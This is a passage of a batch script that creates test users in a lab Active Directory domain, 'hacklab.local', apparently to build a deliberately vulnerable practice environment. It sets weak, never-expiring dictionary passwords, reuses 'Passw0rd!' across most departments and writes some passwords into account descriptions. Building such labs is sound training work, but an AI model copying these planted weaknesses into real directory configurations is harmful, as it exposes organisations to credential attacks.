"cn=c.martiwnez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Ferrari1 -mustchpwd no -pwdneverexpires yes 186 | dsadd user "cn=d.rodrigruez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Samsung1 -mustchpwd no -pwdneverexpires yes 187 | dsadd user "cn=e.sanchjez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Andrea1 -mustchpwd no -pwdneverexpires yes 188 | dsadd user "cn=f.wilyson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Smokey1 -mustchpwd no -pwdneverexpires yes 189 | dsadd user "cn=g.davioos, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Steelers1 -mustchpwd no -pwdneverexpires yes 190 | dsadd user "cn=h.mooeere, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Joseph1 -mustchpwd no -pwdneverexpires yes 191 | dsadd user "cn=i.thomas, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Mercedes1 -mustchpwd no -pwdneverexpires yes 192 | dsadd user "cn=j.johnhson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Dakota1 -mustchpwd no -pwdneverexpires yes 193 | dsadd user "cn=k.martiunez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Arsenal1 -mustchpwd no -pwdneverexpires yes 194 | dsadd user "cn=l.rodrigiuez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Eagles1 -mustchpwd no -pwdneverexpires yes 195 | dsadd user "cn=m.sanychez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Melissa1 -mustchpwd no -pwdneverexpires yes 196 | dsadd user "cn=n.wiwlson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Boomer1 -mustchpwd no -pwdneverexpires yes 197 | dsadd user "cn=o.daviuus, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Booboo1 -mustchpwd no -pwdneverexpires yes 198 | dsadd user "cn=p.moorrre, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Spider1 -mustchpwd no -pwdneverexpires yes 199 | dsadd user "cn=q.thdddomas, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Nascar1 -mustchpwd no -pwdneverexpires yes 200 | dsadd user "cn=r.johntson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Tigers1 -mustchpwd no -pwdneverexpires yes 201 | dsadd user "cn=s.marttinez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Yellow1 -mustchpwd no -pwdneverexpires yes -desc "Changed the users password to Yellow1" 202 | dsadd user "cn=t.rodrieguez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Gateway1 -mustchpwd no -pwdneverexpires yes 203 | dsadd user "cn=u.sancrhez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Marina1 -mustchpwd no -pwdneverexpires yes 204 | dsadd user "cn=v.wilsion, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Diablo1 -mustchpwd no -pwdneverexpires yes 205 | dsadd user "cn=w.davccis, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Bulldog1 -mustchpwd no -pwdneverexpires yes 206 | dsadd user "cn=x.moowsxre, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Qwer12341 -mustchpwd no -pwdneverexpires yes 207 | dsadd user "cn=y.thomeeeas, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Compaq1 -mustchpwd no -pwdneverexpires yes 208 | dsadd user "cn=z.johnqson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Purple1 -mustchpwd no -pwdneverexpires yes 209 | dsadd user "cn=a.martwinez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Hardcore1 -mustchpwd no -pwdneverexpires yes 210 | dsadd user "cn=b.rodrigutuez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Banana1 -mustchpwd no -pwdneverexpires yes 211 | dsadd user "cn=c.sanczhez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Junior1 -mustchpwd no -pwdneverexpires yes 212 | dsadd user "cn=d.wilsuion, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Hannah1 -mustchpwd no -pwdneverexpires yes 213 | dsadd user "cn=e.daerfvis, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Porsche1 -mustchpwd no -pwdneverexpires yes 214 | dsadd user "cn=f.mooure, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Lakers1 -mustchpwd no -pwdneverexpires yes 215 | dsadd user "cn=g.thomeeeas, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Iceman1 -mustchpwd no -pwdneverexpires yes 216 | dsadd user "cn=h.johnsson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Cowboys1 -mustchpwd no -pwdneverexpires yes 217 | dsadd user "cn=i.martinwez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd London1 -mustchpwd no -pwdneverexpires yes 218 | dsadd user "cn=j.rodrwyiguez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Tennis1 -mustchpwd no -pwdneverexpires yes 219 | dsadd user "cn=k.sanchiez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Ncc17011 -mustchpwd no -pwdneverexpires yes 220 | dsadd user "cn=l.wilyson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Coffee1 -mustchpwd no -pwdneverexpires yes 221 | dsadd user "cn=m.davssis, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Scooby1 -mustchpwd no -pwdneverexpires yes 222 | dsadd user "cn=n.moorcre, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Miller1 -mustchpwd no -pwdneverexpires yes 223 | dsadd user "cn=o.thomderas, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Boston1 -mustchpwd no -pwdneverexpires yes 224 | dsadd user "cn=p.johnsson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Q1w2e3r41 -mustchpwd no -pwdneverexpires yes 225 | dsadd user "cn=q.maratinez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Fuckoff1 -mustchpwd no -pwdneverexpires yes 226 | dsadd user "cn=r.rodrieyguez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Brandon1 -mustchpwd no -pwdneverexpires yes 227 | dsadd user "cn=s.sancyhez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Yamaha1 -mustchpwd no -pwdneverexpires yes 228 | dsadd user "cn=t.wilseon, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Chester1 -mustchpwd no -pwdneverexpires yes 229 | dsadd user "cn=u.daytvis, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Mother1 -mustchpwd no -pwdneverexpires yes 230 | dsadd user "cn=v.mocdore, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Forever1 -mustchpwd no -pwdneverexpires yes 231 | dsadd user "cn=w.thomattts, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Johnny1 -mustchpwd no -pwdneverexpires yes 232 | dsadd user "cn=x.johnsaon, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Edward1 -mustchpwd no -pwdneverexpires yes 233 | dsadd user "cn=y.martihnez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Oliver1 -mustchpwd no -pwdneverexpires yes 234 | dsadd user "cn=z.rodrirtguez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Redsox1 -mustchpwd no -pwdneverexpires yes 235 | dsadd user "cn=a.sanchtez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Player1 -mustchpwd no -pwdneverexpires yes 236 | dsadd user "cn=b.wilswon, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Nikita1 -mustchpwd no -pwdneverexpires yes 237 | dsadd user "cn=c.davyis, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Knight1 -mustchpwd no -pwdneverexpires yes 238 | dsadd user "cn=d.moodsre, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Fender1 -mustchpwd no -pwdneverexpires yes 239 | dsadd user "cn=e.thomfffas, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Midnight1 -mustchpwd no -pwdneverexpires yes 240 | dsadd user "cn=f.johnso, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Please1 -mustchpwd no -pwdneverexpires yes 241 | dsadd user "cn=g.martinjez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Brandy1 -mustchpwd no -pwdneverexpires yes 242 | dsadd user "cn=h.rodrigwuez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Badboy1 -mustchpwd no -pwdneverexpires yes 243 | dsadd user "cn=i.sancohez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Iwantu1 -mustchpwd no -pwdneverexpires yes 244 | dsadd user "cn=j.wilesosn, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Slayer1 -mustchpwd no -pwdneverexpires yes 245 | dsadd user "cn=k.dawerris, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Rangers1 -mustchpwd no -pwdneverexpires yes 246 | dsadd user "cn=l.moouiyre, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Charles1 -mustchpwd no -pwdneverexpires yes 247 | dsadd user "cn=m.thogghmas, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Flower1 -mustchpwd no -pwdneverexpires yes 248 | dsadd user "cn=n.johseeson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Bigdaddy1 -mustchpwd no -pwdneverexpires yes 249 | dsadd user "cn=o.martidnez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Wizard1 -mustchpwd no -pwdneverexpires yes 250 | dsadd user "cn=p.rodrasiguez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Bigdick1 -mustchpwd no -pwdneverexpires yes 251 | dsadd user "cn=q.sanchpez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Jasper1 -mustchpwd no -pwdneverexpires yes 252 | dsadd user "cn=r.wilsson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Rachel1 -mustchpwd no -pwdneverexpires yes 253 | dsadd user "cn=s.daveeris, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Steven1 -mustchpwd no -pwdneverexpires yes 254 | dsadd user "cn=t.moodce, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Winner1 -mustchpwd no -pwdneverexpires yes 255 | dsadd user "cn=u.thomhhas, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Adidas1 -mustchpwd no -pwdneverexpires yes -desc "Changed the users password to Adidas1" 256 | dsadd user "cn=v.jhnson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Victoria1 -mustchpwd no -pwdneverexpires yes 257 | dsadd user "cn=w.martfinez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Natasha1 -mustchpwd no -pwdneverexpires yes 258 | dsadd user "cn=x.rodrifguez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Jasmine1 -mustchpwd no -pwdneverexpires yes 259 | dsadd user "cn=y.sancuhez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Winter1 -mustchpwd no -pwdneverexpires yes 260 | dsadd user "cn=z.wilsaon, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Prince1 -mustchpwd no -pwdneverexpires yes 261 | dsadd user "cn=a.davihhuus, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Panties1 -mustchpwd no -pwdneverexpires yes 262 | dsadd user "cn=b.mootfre, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Marine1 -mustchpwd no -pwdneverexpires yes 263 | dsadd user "cn=c.thomhhsas, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Ghbdtn1 -mustchpwd no -pwdneverexpires yes 264 | dsadd user "cn=d.johnsaon, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Fishing1 -mustchpwd no -pwdneverexpires yes 265 | dsadd user "cn=e.martidfnez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Cocacola1 -mustchpwd no -pwdneverexpires yes 266 | dsadd user "cn=f.rodridfguez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Casper1 -mustchpwd no -pwdneverexpires yes 267 | dsadd user "cn=g.sancthez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Raiders1 -mustchpwd no -pwdneverexpires yes 268 | dsadd user "cn=h.wilzson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Marlboro1 -mustchpwd no -pwdneverexpires yes 269 | dsadd user "cn=i.davffis, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Gandalf1 -mustchpwd no -pwdneverexpires yes 270 | dsadd user "cn=j.moodckre, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Asdfasdf1 -mustchpwd no -pwdneverexpires yes 271 | dsadd user "cn=k.thomeweas, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Crystal1 -mustchpwd no -pwdneverexpires yes 272 | dsadd user "cn=l.johnon, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -pwdneverexpires yes 273 | dsadd user "cn=m.martiynez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Golden1 -mustchpwd no -pwdneverexpires yes 274 | dsadd user "cn=n.rodrsiguez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Blowme1 -mustchpwd no -pwdneverexpires yes 275 | dsadd user "cn=o.sanrchez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Bigtits1 -mustchpwd no -pwdneverexpires yes 276 | dsadd user "cn=p.wiltson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Panther1 -mustchpwd no -pwdneverexpires yes 277 | dsadd user "cn=q.davfwfis, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Lauren1 -mustchpwd no -pwdneverexpires yes 278 | dsadd user "cn=r.mooyre, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Angela1 -mustchpwd no -pwdneverexpires yes 279 | 280 | # Head_Office / Administration 281 | 282 | dsadd user "cn=m.jenkins, ou=Administration, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 283 | dsadd user "cn=n.johnson, ou=Administration, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 284 | dsadd user "cn=o.jones, ou=Administration, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 285 | dsadd user "cn=g.white, ou=Administration, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 286 | dsadd user "cn=h.yalden, ou=Administration, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 287 | dsadd user "cn=i.yarbury, ou=Administration, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 288 | dsadd user "cn=j.yardley, ou=Administration, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 289 | 290 | # Head_Office / HR 291 | 292 | dsadd user "cn=z.mcdonald, ou=HR, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 293 | dsadd user "cn=a.murphy, ou=HR, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 294 | dsadd user "cn=b.natt, ou=HR, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 295 | dsadd user "cn=c.nelson, ou=HR, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 296 | dsadd user "cn=d.nightingale, ou=HR, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 297 | dsadd user "cn=e.nixon, ou=HR, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 298 | dsadd user "cn=f.nutter, ou=HR, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 299 | 300 | # Head_Office / Reception 301 | 302 | dsadd user "cn=p.kelly, ou=Reception, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 303 | dsadd user "cn=q.kennedy, ou=Reception, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 304 | dsadd user "cn=u.king, ou=Reception, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 305 | dsadd user "cn=r.knight, ou=Reception, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 306 | dsadd user "cn=s.lawrence, ou=Reception, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 307 | dsadd user "cn=t.lee, ou=Reception, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 308 | 309 | # Head_Office / Research 310 | 311 | dsadd user "cn=u.lewis, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 312 | dsadd user "cn=v.lloyd, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 313 | dsadd user "cn=w.marshall, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 314 | dsadd user "cn=x.martin, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 315 | dsadd user "cn=y.mason, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 316 | dsadd user "cn=g.dell, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 317 | dsadd user "cn=h.osborne, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 318 | dsadd user "cn=i.owen, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 319 | dsadd user "cn=j.oxley, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 320 | dsadd user "cn=k.page, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 321 | dsadd user "cn=l.painter, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 322 | dsadd user "cn=m.palmer, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 323 | dsadd user "cn=n.pastor, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 324 | dsadd user "cn=o.peterson, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 325 | dsadd user "cn=p.quill, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 326 | dsadd user "cn=q.quimby, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 327 | dsadd user "cn=u.quintrell, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 328 | dsadd user "cn=r.ramsey, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 329 | dsadd user "cn=s.ratliff, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 330 | dsadd user "cn=t.richards, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 331 | dsadd user "cn=u.roberts, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 332 | dsadd user "cn=v.robinson, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 333 | dsadd user "cn=w.scott, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 334 | dsadd user "cn=x.simpson, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 335 | dsadd user "cn=y.smith, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 336 | dsadd user "cn=z.stewart, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 337 | dsadd user "cn=a.taylor, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 338 | dsadd user "cn=b.turner, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 339 | dsadd user "cn=c.walsh, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 340 | dsadd user "cn=d.ward, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 341 | dsadd user "cn=e.webb, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 342 | dsadd user "cn=f.west, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 343 | 344 | # Head_Office / Sales 345 | 346 | dsadd user "cn=d.atkinson, ou=Sales, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Summer123 -mustchpwd no 347 | dsadd user "cn=e.bailey, ou=Sales, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 348 | dsadd user "cn=f.baker, ou=Sales, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 349 | dsadd user "cn=g.ball, ou=Sales, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 350 | dsadd user "cn=h.bell, ou=Sales, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 351 | dsadd user "cn=i.brown, ou=Sales, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 352 | dsadd user "cn=j.burton, ou=Sales, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 353 | dsadd user "cn=k.carter, ou=Sales, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 354 | dsadd user "cn=l.clarke, ou=Sales, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 355 | dsadd user "cn=m.cole, ou=Sales, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 356 | dsadd user "cn=e.griffiths, ou=Sales, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 357 | dsadd user "cn=f.hall, ou=Sales, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 358 | dsadd user "cn=g.hamilton, ou=Sales, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 359 | dsadd user "cn=h.harris, ou=Sales, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 360 | dsadd user "cn=i.harvey, ou=Sales, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 361 | dsadd user "cn=j.hill, ou=Sales, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 362 | dsadd user "cn=k.jackson, ou=Sales, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 363 | dsadd user "cn=l.james, ou=Sales, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 364 | 365 | # Head_Office / Senior_Management 366 | 367 | dsadd user "cn=k.yarrow, ou=Senior_Management, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 368 | dsadd user "cn=l.yates, ou=Senior_Management, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 369 | dsadd user "cn=m.young, ou=Senior_Management, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no 370 | dsadd user "cn=n.zachary, 